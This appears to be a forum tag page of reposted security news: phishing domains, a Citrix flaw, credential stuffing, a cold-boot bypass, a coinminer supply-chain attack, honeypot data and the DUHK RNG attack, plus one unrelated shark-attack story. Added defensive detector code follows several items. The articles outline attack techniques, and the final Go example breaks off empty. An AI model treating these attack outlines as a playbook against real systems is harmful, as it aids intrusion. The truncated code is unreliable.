Showing results for tags 'attack'.
Found 16 results

  1. Why block them when you can fool them? New tool sets traps for hackers. Instead of blocking hackers, the researchers have created a new cybersecurity defence approach, which involves setting traps for hackers. The method, called DEEP-Dig (DEcEPtion DIGging), ushers intruders into a decoy site so the computer can learn from hackers’ tactics. The information is then used to train the computer to recognise and stop future attacks. DEEP-Dig advances a rapidly growing cybersecurity field known as deception technology, which involves setting traps for hackers. “There are criminals trying to attack our networks all the time, and normally we view that as a negative thing, instead of blocking them, maybe what we could be doing is viewing these attackers as a source of free labour,” said study researcher Kevin Hamlen from University of Texas in Dallas, US. “They’re providing us data about what malicious attacks look like. It’s a free source of highly prized data,” Hamlen added. The approach aims to solve a major challenge to using artificial intelligence (AI) for cybersecurity: a shortage of data needed to train computers to detect intruders. The lack of data is due to privacy concerns. Better data will mean better ability to detect attacks, the researchers said. “We’re using the data from hackers to train the machine to identify an attack, we’re using deception to get better data,” said study researcher Gbadebo Ayoade.
Hackers typically begin with their simplest tricks and then use increasingly sophisticated tactics, the researchers said. But most cyberdefense programmes try to disrupt intruders before anyone can monitor the intruders’ techniques. DEEP-Dig will give researchers a window into hackers’ methods as they enter a decoy site stocked with disinformation. The decoy site looks legitimate to intruders and attackers will feel they’re successful, said study researcher Latifur Khan. As hackers’ tactics change, DEEP-Dig could help cybersecurity defence systems keep up with their new tricks. According to the researchers, while DEEP-Dig aims to outsmart hackers, it might be possible that hackers could have the last laugh if they realise they have entered a decoy site and try to deceive the programme. “So far, we’ve found this doesn’t work. When an attacker tries to play along, the defence system just learns how hackers try to hide their tracks, it’s an all-win situation -- for us, that is,” Hamlen said. The study was presented at the annual Computer Security Applications Conference in December in Puerto Rico. Source
  2. Microsoft said it got a court order to seize 50 websites used by a hacker group with ties to North Korea that targeted government employees, universities, human rights organizations and nuclear proliferation groups in the U.S., Japan and South Korea. The group, known as Thallium, uses the network of websites, domains and connected computers to send out “spear phishing” emails. Hackers gather as much information on targets as they can to personalize messages and make them appear legitimate. When the target clicks on a link in the email, hackers are then able to “compromise their online accounts, infect their computers, compromise the security of their networks and steal sensitive information,” Microsoft wrote in a blog post. Microsoft showed an example of one of Thallium’s spear phishing messages. It looks very much like a standard notification that comes with signing into a Microsoft account in a new location. One big difference, Microsoft says, is the group combined the letters “r” and “n” in the domain name to look like the first letter “m” in “microsoft.com.” Microsoft, through its Digital Crimes Unit and Threat Intelligence Center, has positioned itself as an important line of defense against so-called “nation state” hacking organizations. Microsoft has in recent years taken on hacking groups with ties to China, Iran and Russia. The tech giant uses the information it gathers from tracking these hackers to beef up its security products. Microsoft recommended a number of actions organizations can take to better protect themselves, including enabling two-factor authentication on business and personal email accounts, training people to spot phishing attempts and enabling security alerts about links and files from suspicious websites. Source: MSN
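The "rn" for "m" trick above is a general class of look-alike domains, and it can be checked mechanically. The following is an added Python example (not code from the Microsoft post or its source): it folds character sequences that render like a single letter into that letter, then compares the result against a list of protected brands. The brand list and the genuine-domain list are assumptions for illustration; a real deployment would load its own.

```python
from urllib.parse import urlsplit

# Character sequences that render like a single different letter in common
# sans-serif fonts; "rn" for "m" is the trick the Thallium lure used.
MULTI_CHAR_CONFUSABLES = {
    "rn": "m",
    "vv": "w",
    "cl": "d",
}
# Single characters commonly swapped for the letters they resemble.
SINGLE_CHAR_CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

# Brands to protect and the domains that genuinely belong to them
# (assumed lists for this example).
PROTECTED_BRANDS = ("microsoft", "outlook", "office")
GENUINE_DOMAINS = ("microsoft.com", "outlook.com", "office.com")


def skeleton(label: str) -> str:
    """Collapse a DNS label to the string it visually resembles."""
    s = label.lower()
    for seq, single in MULTI_CHAR_CONFUSABLES.items():
        s = s.replace(seq, single)
    return s.translate(SINGLE_CHAR_CONFUSABLES)


def is_genuine(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in GENUINE_DOMAINS)


def lookalike_brand(host: str):
    """Return the brand a host imitates, or None if it is genuine or unrelated."""
    host = host.lower().rstrip(".")
    if is_genuine(host):
        return None
    labels = host.split(".")
    # Check both the registrable label (the part the registrant chose) and the
    # whole host, so "rnicrosoft.com" and "login-rnicrosoft.example" both trip.
    registrable = labels[-2] if len(labels) >= 2 else labels[0]
    candidates = {skeleton(registrable), skeleton(host)}
    for brand in PROTECTED_BRANDS:
        if any(skeleton(brand) in c for c in candidates):
            return brand
    return None


def check_link(url: str):
    """Pull the host out of a link found in a message and check it."""
    host = urlsplit(url).hostname or ""
    return lookalike_brand(host)
```

Run `check_link("https://account.rnicrosoft.com/security/signin")` and it returns `"microsoft"`, while the genuine `https://login.microsoft.com/` returns `None`. The skeleton approach is deliberately aggressive: any domain whose folded form contains a protected brand is flagged, which is the right bias when triaging links in inbound mail.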
  3. Unauthorised users able to perform 'arbitrary code execution' A critical vulnerability found in Citrix Application Delivery Controller and Citrix Gateway (formerly known as Netscaler ADC and Netscaler Gateway) means businesses with apps published using these technologies may be exposing their internal network to unauthorised access. Citrix (NetScaler) ADC is a load balancer and monitoring tech, while Unified Gateway provides remote access to internal applications. This can include desktop applications as well as intranet or web applications. "Any application on any device from any location" is the marketing pitch. On 17 December, Citrix published an advisory stating that a vulnerability in these services "could allow an unauthenticated attacker to perform arbitrary code execution." According to Positive Technologies, the security company which discovered the flaw, no account details are required. Positive says the "first vulnerable version of the software was released in 2014", and estimates that "at least 80,000 companies in 158 countries are potentially at risk." Since the whole idea of this technology is to enable remote access to internal applications, arbitrary code execution could give the attacker access to the internal network, making it a particularly critical flaw. Citrix has published mitigation steps which block certain SSL VPN requests, suggesting that this area is where the flaw lies. This is a mitigation rather than a complete fix. An SSL VPN is a secure tunnel into a remote network which uses the SSL protocol. The affected versions of Citrix ADC and Unified Gateway include 10.5, 11.1, 12.0, 12.1 and 13.0. The problem has been assigned the ID CVE-2019-19781 and details will be available at this link when published. Citrix said it is "notifying customers and channel partners about this potential security issue." Administrators are advised to apply the mitigation immediately. A full software fix will be made available in due course. Source
  4. A surfer who refers to himself as "shark bait" has been hospitalized after a shark attack during an early morning surf on the NSW mid-north coast. The man received five deep lacerations to one of his lower legs when he was bitten by a shark at Nambucca Heads after 7am on Sunday, a NSW Ambulance spokesman said. Joel Mason, 36, managed to swim to a nearby break wall, where a passer-by saw him and contacted emergency services. He was treated at the scene before being flown to John Hunter Hospital in Newcastle, where he's in a stable condition. Mr Mason's father, Rob, told Nine News his son has loved surfing since he was young and it was "very disturbing" when he found out about the incident. "He's surfed since he was 5 or 6 years old," Mr Mason said. "He loves to surf early and he loves to surf by himself which is sort of a bit risky. "He says he's shark bait but he's prepared to take the risk and he does." NSW Ambulance spokesman Steve Fraser said Mr Mason remained "extremely calm, extremely stoic" throughout the ordeal. Source
  5. Attackers gained access to some AdGuard accounts but company can't tell how many. AdGuard, a popular ad blocker for Android, iOS, Windows, and Mac, has reset all user passwords, the company's CTO Andrey Meshkov announced today. The company took this decision after suffering a brute-force attack during which an unknown attacker tried to log into user accounts by guessing their passwords. Meshkov said the attacker used emails and passwords that were previously leaked into the public domain after breaches at other companies. This type of attack --using leaked usernames and passwords to hack into accounts at other services-- is known as credential stuffing. The AdGuard CTO said attackers were successful in their assault and gained access to some AdGuard accounts, used for storing ad blocker settings. "We don't know what accounts exactly were accessed by the attackers," Meshkov said. "All passwords stored in AdGuard database are encrypted so we cannot check whether any of them is present in the known leaked database. That's why we decided to reset passwords of all users." The company says it implemented the Have I Been Pwned API into their existing infrastructure so that when users configure a new password, the AdGuard system will warn them if they're using passwords leaked at other services. Meshkov said AdGuard now also uses stricter rules for choosing passwords, and they intend to support two-factor authentication in the future. The AdGuard exec also revealed that the company found out about the attack after its rate-limiting systems detected the numerous failed login attempts during the password guessing phase of the attack. Most of the attacks were stopped, but some were successful, which usually tends to happen when attackers get lucky and guess the proper combination during the first login attempts. It is unclear what the attackers were attempting to do with such low-value accounts. Source
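The Have I Been Pwned check AdGuard describes works on a k-anonymity "range" endpoint: the client hashes the candidate password with SHA-1, sends only the first five hex characters, and matches the remaining 35 against the suffixes the service returns. The following is an added Python example, not AdGuard's code; the range data is constructed for the example (only the entry for "password" mirrors a real hash), and the network call is replaced by an offline lookup so it runs anywhere.

```python
import hashlib
from typing import Callable, Dict

# Offline stand-in for the k-anonymity "range" endpoint. A real client would do
#   urllib.request.urlopen("https://api.pwnedpasswords.com/range/" + prefix)
# and receive lines of "HASH-SUFFIX:COUNT". The data below is constructed for
# this example and is not real breach data.
CONSTRUCTED_RANGES: Dict[str, str] = {
    "5BAA6": (
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493\r\n"   # sha1("password") minus its prefix
        "00D4F6E8FA6EECAD2A3AA415EEC418D38EC:2\r\n"
        "011053FD0102E94D6AE2F8B83D76FAF94F6:0\r\n"         # count 0: padding entry, harmless
    ),
}


def fetch_range_offline(prefix: str) -> str:
    return CONSTRUCTED_RANGES.get(prefix, "")


def parse_range(body: str) -> Dict[str, int]:
    """Turn the 'SUFFIX:COUNT' response body into a lookup table."""
    counts = {}
    for line in body.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        suffix, count = line.split(":", 1)
        counts[suffix.upper()] = int(count)
    return counts


def pwned_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """How often the password appears in the corpus. Only the 5-character hash
    prefix ever leaves the client, so the service never learns the password."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    return parse_range(fetch_range(prefix)).get(suffix, 0)


def accept_new_password(password: str, fetch_range=fetch_range_offline, min_len: int = 12):
    """Policy applied when a user sets a new password: a length rule plus the
    breach check. Returns (accepted, reason)."""
    if len(password) < min_len:
        return False, "too short"
    n = pwned_count(password, fetch_range)
    if n > 0:
        return False, f"seen {n} times in known breaches"
    return True, "ok"
```

Two details matter in practice: the comparison is done on the uppercase hex suffix the service returns, and a prefix that is absent from the response (or present with count 0) is treated as "not seen", which is why the lookup falls back to 0 rather than failing.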
  6. If you want to secure the data on your computer, one of the most important steps you can take is encrypting its hard drive. That way, if your laptop gets lost or stolen—or someone can get to it when you're not around—everything remains protected and inaccessible. But researchers at the security firm F-Secure have uncovered an attack that uses a decade-old technique, which defenders thought they had stymied, to expose those encryption keys, allowing a hacker to decrypt your data. Worst of all, it works on almost any computer. To get the keys, the attack uses a well-known approach called a "cold boot," in which a hacker shuts down a computer improperly—say, by pulling the plug on it—restarts it, and then uses a tool like malicious code on a USB drive to quickly grab data that was stored in the computer's memory before the power outage. Operating systems and chipmakers added mitigations against cold boot attacks 10 years ago, but the F-Secure researchers found a way to bring them back from the dead. In Recent Memory Cold boot mitigations in modern computers make the attack a bit more involved than it was 10 years ago, but a reliable way to decrypt lost or stolen computers would be extremely valuable for a motivated attacker—or one with a lot of curiosity and free time. "If you get a few moments alone with the machine, the attack is a very reliable way to extract secrets from the memory," says Olle Segerdahl, principal security consultant at F-Secure. "We tested it on a number of different makes and models and found that the attack is effective and reliable. It's a bit invasive because it involves unscrewing the case and connecting some wires, but it's pretty quick and very doable for a knowledgeable hacker. It's not super technically challenging." 
Segerdahl notes that the findings have particular implications for corporations and other institutions that manage a large number of computers, and could have their whole network compromised off of one lost or stolen laptop. To carry out the attack, the F-Secure researchers first sought a way to defeat the industry-standard cold boot mitigation. The protection works by creating a simple check between an operating system and a computer's firmware, the fundamental code that coordinates hardware and software for things like initiating booting. The operating system sets a sort of flag or marker indicating that it has secret data stored in its memory, and when the computer boots up, its firmware checks for the flag. If the computer shuts down normally, the operating system wipes the data and the flag with it. But if the firmware detects the flag during the boot process, it takes over the responsibility of wiping the memory before anything else can happen. Looking at this arrangement, the researchers realized a problem. If they physically opened a computer and directly connected to the chip that runs the firmware and the flag, they could interact with it and clear the flag. This would make the computer think it shut down correctly and that the operating system wiped the memory, because the flag was gone, when actually potentially sensitive data was still there. So the researchers designed a relatively simple microcontroller and program that can connect to the chip the firmware is on and manipulate the flag. From there, an attacker could move ahead with a standard cold boot attack. Though any number of things could be stored in memory when a computer is idle, Segerdahl notes that an attacker can be sure the device's decryption keys will be among them if she is staring down a computer's login screen, which is waiting to check any inputs against the correct ones. 
Cold Case Because of the threat posed by this type of attack, Segerdahl says that institutions should keep careful track of all their devices so they can take action if one is reported lost or stolen. No matter how big an organization is, IT managers need to be able to revoke VPN credentials, Wi-Fi certificates, and other authenticators that let devices access the full network to minimize the fallout if a missing device is compromised. Another potential protection involves setting computers to automatically shut down when idle rather than going to sleep and then using a disk encryption tool—like Microsoft's BitLocker—to require an extra PIN when a computer turns on, before the operating system actually boots. This way there's nothing in memory yet to steal. If you're worried about leaving your computer unsupervised, tools that monitor for physical interactions with a device—like the Haven mobile app and Do Not Disturb Mac application—can help notify you about unwanted physical access to a device. Intrusions like the cold boot technique are often called "evil maid" attacks. The researchers notified Microsoft, Apple, and Intel about their findings. Microsoft has released updated guidance on using BitLocker to manage the problem. “This technique requires physical access. To protect sensitive info, at a minimum, we recommend using a device with a discrete Trusted Platform Module (TPM), disabling sleep/hibernation and configuring BitLocker with a Personal Identification Number,” Jeff Jones, a senior director at Microsoft said. Segerdahl says, though, that he doesn't see a quick way to fix the larger issue. Operating system tweaks and firmware updates could make the flag-check process more resilient, but since attackers are already accessing and manipulating the firmware as part of the attack, they could simply downgrade updated firmware back to a vulnerable version. 
As a result, Segerdahl says, long-term mitigations require physical design changes that make it harder for an attacker to manipulate the flag check. Apple has already created one such solution through its T2 chip in new iMacs. The scheme separates certain crucial processes on a dedicated, secure chip away from the main processors that run general firmware and the operating system. Segerdahl says that though the renewed cold boot attack works on most Macs, the T2 chip does successfully defeat it. An Apple spokesperson also suggested that users could set a firmware password to prevent unauthorized access, and that the company is exploring how to protect Macs that don't have a T2. Intel declined to comment on the record. "This is only fixable through hardware updates," says Kenn White, director of the Open Crypto Audit Project, who did not participate in the research. "Physical access is a constant cat and mouse game. The good news for most people is that 99.9 percent of thieves would just sell a device to someone who would reinstall the OS and delete your data." For institutions with valuable data or individuals carrying sensitive information, though, the risk will continue to exist on most computers for years to come. Source
  7. Microsoft said today that hackers compromised a font package installed by a PDF editor app and used it to deploy a cryptocurrency miner on users' computers. The OS maker discovered the incident after its staff received alerts via the Windows Defender ATP, the commercial version of the Windows Defender antivirus. Microsoft employees say they investigated the alerts and determined that hackers breached the cloud server infrastructure of a software company providing font packages as MSI files. These MSI files were offered to other software companies. One of these downstream companies was using these font packages for its PDF editor app, which would download the MSI files from the original company's cloud servers during the editor's installation routine. Hackers created a copy of the company's cloud servers "Attackers recreated the [first company's] infrastructure on a replica server that the attackers owned and controlled. They copied and hosted all MSI files, including font packages, all clean and digitally signed, in the replica server," Microsoft's security researchers said. "The attackers decompiled and modified one MSI file, an Asian fonts pack, to add the malicious payload with the coin mining code," they added. "Using an unspecified weakness (which does not appear to be MITM or DNS hijack), the attackers were able to influence the download parameters used by the [PDF editor] app. The parameters included a new download link that pointed to the attacker server," Microsoft said. Users who downloaded and ran the PDF editor app would unknowingly install the font packages, including the malicious one, from the hackers' cloned server. Supply chain attack within a supply chain Because the PDF editor app was installed under SYSTEM privileges, the malicious coinminer code hidden inside would receive full access to a user's system. 
The malicious miner would create its own process named xbox-service.exe under which it would mine for cryptocurrencies using victims' computers. Microsoft said Windows Defender ATP detected mining-specific behavior from this process. Investigators then tracked down the origin of this process to the PDF editor app installer and the MSI font packages. Security researchers said it was easy to identify which MSI font package was the malicious one because all other MSI files were signed by the original software company, except one file, which lost its authenticity when crooks injected the coinminer code inside it. This malicious miner also stood out to investigators because it also tried to modify the Windows hosts file in a poor attempt at sinkholing update operations for various security apps. Tinkering with the Windows hosts file is a big no-no, and most antivirus software will mark this operation as suspicious or malicious. Microsoft did not reveal the names of the two software companies involved in this incident. The OS maker says the compromise lasted between January and March 2018, and affected only a small number of users, suggesting the hacked companies aren't big names on the PDF software market. Source
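The hosts-file tampering that gave the miner away is easy to check for on any endpoint. The following is an added Python example (not Microsoft's detection logic): it parses a hosts file, ignores the stock loopback entries, and flags any vendor update hostname that has been redirected, plus any other non-stock name pointed at a sinkhole address. The sample file is constructed; the watched-domain list is illustrative (windowsupdate.com and update.microsoft.com are real Microsoft update domains, the example-av names stand in for other vendors).

```python
import ipaddress
from typing import List, Tuple

SINKHOLE_IPS = {"127.0.0.1", "0.0.0.0", "::1", "::"}
# Names that legitimately point at loopback in a stock hosts file.
STOCK_LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback",
                     "ip6-localnet", "ip6-mcastprefix", "ip6-allnodes", "ip6-allrouters",
                     "broadcasthost"}
# Update hostnames whose redirection is suspicious (illustrative list).
WATCHED_SUFFIXES = ("windowsupdate.com", "update.microsoft.com",
                    "update.example-av.com", "liveupdate.example-av.com")


def parse_hosts(text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, normalised ip, hostnames) for every active entry."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()   # drop whole-line and inline comments
        if not line:
            continue
        parts = line.split()
        try:
            ip = str(ipaddress.ip_address(parts[0]))
        except ValueError:
            continue   # malformed line; not what we are hunting here
        if len(parts) > 1:
            entries.append((lineno, ip, [h.lower() for h in parts[1:]]))
    return entries


def find_sinkholed(text: str):
    """Flag entries that redirect a watched update domain, and any non-stock
    name that has been pointed at a sinkhole address."""
    findings = []
    for lineno, ip, names in parse_hosts(text):
        for name in names:
            watched = any(name == s or name.endswith("." + s) for s in WATCHED_SUFFIXES)
            if watched:
                findings.append((lineno, ip, name, "watched update domain redirected"))
            elif ip in SINKHOLE_IPS and name not in STOCK_LOCAL_NAMES:
                findings.append((lineno, ip, name, "non-stock name pointed at sinkhole"))
    return findings


# Constructed sample; not a hosts file from the incident.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost ip6-localhost
192.168.1.10    build.internal   # legitimate local override
127.0.0.1       update.example-av.com liveupdate.example-av.com
0.0.0.0         windowsupdate.com download.windowsupdate.com
127.0.0.1       telemetry.example-av.com
"""
```

On the sample, lines 5 and 6 are reported as redirected update domains and line 7 as an unknown name pointed at loopback; the local build override on line 4 is left alone because a private address is neither a sinkhole nor a watched domain. The second rule is the more general one: an update domain you did not think to list still shows up as "something not in the stock file pointed at 127.0.0.1".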
  8. Many people tell me that their websites are safe. Why? Because "Who will bother to attack my site?" Or "Our business is too small for anyone to hack." Oh please! There's this popular fallacy that attackers on the internet always target particular sites. They don't. Yes, some do. I'm looking at you Equifax. But most attacks are made by bots, which don't know a thing about you, your business, or your website. Bots don't care who you are or what you do. If you're on the web, you're a target. According to the web security company Imperva, half of all website visitors are bots. Of those, approximately 29 percent of all your "visitors" are there to attack your site. Contrary to those of you who think your website is too small to be noticed, Imperva found the less traffic you get, the more likely you are to be attacked. "In the least trafficked domains -- those frequented by ten human visitors a day or less -- bad bots accounted for 47.7 percent of visits while total bot traffic amounted to 93.3 percent." Indeed, "Bad bots will try to hack [your site] regardless of how popular it is with the human folk. They will even keep visiting a domain in absence of all human traffic." Does that sound crazy? For people, yes, but bots aren't people. They're constantly scanning the web and attacking sites over and over again. Don't believe it? Let's look at the evidence. Honeynet, an international non-profit security research organization, with help from students at Holberton School, recently set up a honeypot to track security attacks on a cloud-based webserver. This ran on a barebones Amazon Web Services (AWS) instance. It was running no services that would be useful to anybody else. It did not even have a domain name. Shortly after starting the server, they started capturing network packets for a 24-hour period with the best network traffic analysis tool available today, Wireshark. 
They then analyzed the packet capture file with Wireshark; Computer Incident Response Center's (CIRCL) Border Gateway Protocol (BGP) ranking API; and p0f, a passive TCP/IP traffic fingerprinting program. In a day, a mere 24 hours, this unnamed, almost invisible web server was attacked more than a quarter of a million times. Think about that for a minute. Now, start locking down your website. Of those attacks, the vast majority of them, 255,796 connection attempts, were made via Secure Shell (SSH). The researchers then opened a honeypot, a server designed to look like a real website, to collect attack data. To keep the project workable, they chose to open up the web's Hypertext Transfer Protocol (HTTP), SSH, and the Telecommunications Network (Telnet) protocol for attacks. Telnet, some of you may ask? Who uses Telnet anymore? We do, thanks to badly designed Internet of Things (IoT) devices. Some IoT gadgets use Telnet for configuration and management. That's asking for your devices to be hacked. Telnet has never had any security to speak of. The majority of the HTTP attacks were made to PHPMyadmin, a popular MySQL and MariaDB remote management system. Many web content management systems, not to mention WordPress, rely on these databases. Vulnerable WordPress plugins were also frequently attacked. Mind you, this was on a system that even in honeypot mode hadn't emitted a single packet towards the outside world. Many attempted attacks relied on old malware, known configuration problems, common username/password combinations, and previous well-known attacks. For example, attackers tried to crack the webserver with Shellshock, although patched in 2014, and the Apache Struts vulnerability, which was fixed in March 2017. You can't blame the people who write the bots for using obsolete attack vectors. As well-known security expert SwiftOnSecurity tweeted: "Pretty much 99.99 percent of computer security incidents are oversights of solved problems." 
As for SSH, most of the attacks were brute-force assaults running through lists of commonly used usernames and passwords over the entire range, 1-65535, of TCP ports. Is it any surprise that Imperva has found that one in three website visitors is an attack bot? Imperva and Holberton also found that "The attack patterns we recorded for HTTP and SSH relied on generic exploit attempts that seemed to scan a range of IP addresses for well-known vulnerabilities. Telnet, on the other hand, relied on even simpler intrusion methods, by bruteforcing with default username and password combinations. Sometimes, these spray-and-pray attacks immediately attempted to download antiquated scripts, or more contemporary trojans, but none of the recorded attempts were covert enough to evade detection or overcome simple protective measures." These attacks aren't sophisticated. They're being driven by bot and botnets to attack any and all sites they find. These automated hackers are hunting for weak, unprotected websites. The moral of this story is if you have any web presence -- and I mean any -- you must secure your site with basic security rules. That starts with using firewalls to block all ports to your site except for the ones you use. You must also disable any internet-facing services unless you're using them. Finally, you must keep your software patched and up to date. Your site will still get hammered on a daily basis, but you'll be safe from the vast majority of automated hackers. source
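The SSH brute-force traffic the honeypot saw leaves an unmistakable trace in sshd's own log, and it is worth having a detector for it even on a box with key-only auth. The following is an added Python example (not from the Honeynet/Holberton project): it parses sshd auth-log lines, counts failures per source address in a sliding window, and separately flags a password login accepted from an address that had just been failing, which is what a successful guess looks like. The log lines are constructed for this example and use RFC 5737 documentation addresses.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# sshd auth.log lines, constructed for this example.
SAMPLE_AUTH_LOG = """\
Sep 14 03:21:07 web sshd[1201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
Sep 14 03:21:09 web sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51024 ssh2
Sep 14 03:21:10 web sshd[1205]: Failed password for root from 203.0.113.7 port 51026 ssh2
Sep 14 03:21:12 web sshd[1207]: Failed password for invalid user pi from 203.0.113.7 port 51028 ssh2
Sep 14 03:21:13 web sshd[1209]: Failed password for invalid user ubuntu from 203.0.113.7 port 51030 ssh2
Sep 14 03:21:15 web sshd[1211]: Accepted password for root from 203.0.113.7 port 51032 ssh2
Sep 14 03:25:40 web sshd[1300]: Accepted publickey for deploy from 198.51.100.5 port 40110 ssh2
Sep 14 03:40:01 web sshd[1350]: Failed password for deploy from 198.51.100.5 port 40112 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_line(line: str, year: int = 2018):
    """Return (timestamp, result, method, user, ip) or None for unrelated lines.
    Syslog timestamps carry no year, so one is supplied."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["method"], m["user"], m["ip"]


def detect_bruteforce(log: str, threshold: int = 5, window_s: int = 60):
    """Two signals: (1) at least `threshold` failures from one address inside a
    sliding window of `window_s` seconds; (2) a password login accepted from an
    address that still has failures in its window."""
    alerts = []
    recent = defaultdict(deque)       # ip -> timestamps of recent failures
    already_alerted = set()
    for line in log.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, result, method, user, ip = rec
        q = recent[ip]
        while q and (ts - q[0]).total_seconds() > window_s:
            q.popleft()               # expire failures that fell out of the window
        if result == "Failed":
            q.append(ts)
            if len(q) >= threshold and ip not in already_alerted:
                alerts.append(("bruteforce", ip, f"{len(q)} failures in {window_s}s"))
                already_alerted.add(ip)
        elif method == "password" and q:
            alerts.append(("success_after_failures", ip, f"user {user} after {len(q)} failures"))
    return alerts
```

On the sample, 203.0.113.7 trips the threshold on its fifth failure and then raises the second, more serious alert when its password guess for root is accepted two seconds later; the deploy user's single typo from 198.51.100.5 does not. The "success after failures" rule is the one worth paging on: it is the difference between background noise and a compromised account.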
  9. Man Threatened Company with Cyber Attack to Fire Employee and Hire Him Instead A North Carolina judge sentenced a Washington man this week to 37 months in prison for threatening a company with attacks unless they fire one of their employees and hire him instead. According to court documents obtained by Bleeping Computer, on April 18, 2016, Todd Michael Gori sent an email to TSI Healthcare, a healthcare software vendor based in Chapel Hill, North Carolina. Gori, a 28-year-old resident of Wenatchee, Washington, threatened the company with cyber attacks by him and unnamed friends if the company did not fire one of its employees and hire him instead. Gori's email extortion "I am giving you, TSI healthcare two choices," Gori wrote in the email. "You either lay-off [identity redacted] and replace her with me, an operator 100x better that she is oppressing. Or I will take out your entire company along with my comrades via a cyber attack." According to the same letter, Gori was fueled by a personal vendetta after the same employee denied his job application several times in the past. "Again you have two choices. Get ride of her and hire me. Or slowly be chipped away at until you are gone. She is a horrible operator that can only manage 2 screens with an over inflated travel budget. I fly at least 10x as many places as this loon on 1/5th of the budget," the email reads. "I have petitioned for a job with you guys with her as a reference as I am a felon with computer skills and need assistance getting work as technically I have 'no work history'. She declines everytime and burries me even further." Gori then bragged about having pen-tested TSI's website and having found weak security measures. "'Im giving you guys 72 hours to respond until the attack goes full scale. There is nothing that can be done to stop the attacks. I have ran multiple penetration tests on your entire network and your company fails miserably. "Again let me be clear. 
The only way I will work with TSI and stop the attack is to fire [identifying information redacted] and hire me and ensure I am compensated enough ..." Gori allegedly threatened to shoot TSI employees Gori did not detail the type of cyber-attack he was preparing. TSI turned to the FBI after receiving the email threat. Authorities tracked down and arrested Gori in August 2017. According to the original indictment, the FBI charged Gori on more severe charges after they found out he also threatened to buy a gun and shoot TSI employees. Gori signed a plea agreement soon after his arrest, and prosecutors dropped this latter charge. Besides the 37-month prison stint, Gori also received three years of supervised release. https://www.bleepingcomputer.com/news/security/man-threatened-company-with-cyber-attack-to-fire-employee-and-hire-him-instead/
  10. After last week we had the KRACK and ROCA cryptographic attacks, this week has gotten off to a similarly "great" start with the publication of a new crypto attack known as DUHK (Don't Use Hard-coded Keys). The issue at the heart of the DUHK attack is a combination of two main factors. The first is the usage of the ANSI X9.31 Random Number Generator (RNG). This is an algorithm that takes random data and generates encryption keys used to secure VPN connections, browsing sessions, and other encrypted traffic/data. The second factor needed for a DUHK attack is when hardware vendors use a hardcoded "seed key" for the ANSI X9.31 RNG algorithm. Normally, vendors should generate a random seed key at device startup or before launching the ANSI X9.31 algorithm. This means that when you have hardware/software products that combine ANSI X9.31 and deploy a hardcoded seed key, attackers can decrypt encrypted communications carried out through that device. This includes communications passing over VPN connections or encrypted web sessions that carry out login credentials, payment information, Intranet information, private enterprise data, and more. Old Fortinet FortiGate devices vulnerable to DUHK attacks The DUHK attack was discovered by two researchers from the University of Pennsylvania and one researcher from Johns Hopkins University. In a research paper they published today — entitled "Practical state recovery attacks against legacy RNG implementations" — researchers reveal they were able to recover encrypted traffic from Fortinet FortiGate devices used by companies across the world as firewalls or to create private VPN networks. The research team says they reverse engineered FortiGate firmware images and found the hard-coded seed key. They then observed traffic coming from the affected device and using the seed key, they brute-forced encrypted data to guess the rest of the encryption parameters. This, in turn, allowed them to determine the main encryption key. 
Fortinet FortiGate devices using FortiOS 4.3.0 to FortiOS 4.3.18 are vulnerable to DUHK attacks (CVE-2016-8492). FortiOS 5.x is not affected, while Fortinet removed the hard-coded seed key in FortiOS 4.3.19 after researchers contacted the company. At the time of their research, experts said they found over 23,000 older Fortinet 4.x devices exposed online. This number could be greater, as some devices might be located on firewalled networks, but still vulnerable to attacks. DUHK attack takes up to 4 mins/connection The attack is not trivial, but researchers say it's practical as an attacker using a modern computer can recover the encryption key in around four minutes per connection. There is no user interaction needed to carry out a DUHK attack, as all the threat actor needs is a position to observe traffic coming from a vulnerable device. Because this is a passive network attack, victims cannot detect when someone uses a DUHK attack against them. The research team also warns that other hardware and software products may also be affected by DUHK attacks. Researchers also published a list of products where they found hard-coded ANSI X9.31 seed keys. ANSI X9.31 was a very popular RNG algorithm This is because ANSI X9.31 is very widespread. Up until January 2016, the algorithm was on the list of US government (FIPS) approved RNG algorithms. ANSI X9.31 remained on the list until 2016, even if US NIST deprecated the algorithm in 2011, and scientists warned that the algorithm could be broken if the seed key ever leaked way back in 1998. "If your product was certified after January 2016, then it is not vulnerable," the research team says. "If it was certified for the X9.31 RNG at any time, FIPS certification does not prevent this implementation vulnerability." This is because vendors could have FIPS-compliant ANSI X9.31 implementations, but if they left a hard-coded seed key in the firmware, they automatically backdoored their own device's encryption. 
More details about the DUHK attack are available on this dedicated homepage, and in a blog post by Matthew Green, one of the researchers. https://www.bleepingcomputer.com/news/security/duhk-crypto-attack-recovers-encryption-keys-exposes-vpn-connections-more/ This doesnt look good.
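To make the mechanism behind the post concrete, here is an added Go example (not code from the article, the researchers, or Fortinet) that implements the AES-based form of the ANSI X9.31 generator and checks the property DUHK relies on from the defender's side: two generators built from the same hard-coded seed key and the same state emit byte-identical output, so the only secret left is the timestamp and seed value, whereas a key drawn from the OS CSPRNG at startup makes two devices diverge even for identical timestamps. The key bytes, seed value and timestamp layout are constructed placeholders, not the FortiOS values.

```go
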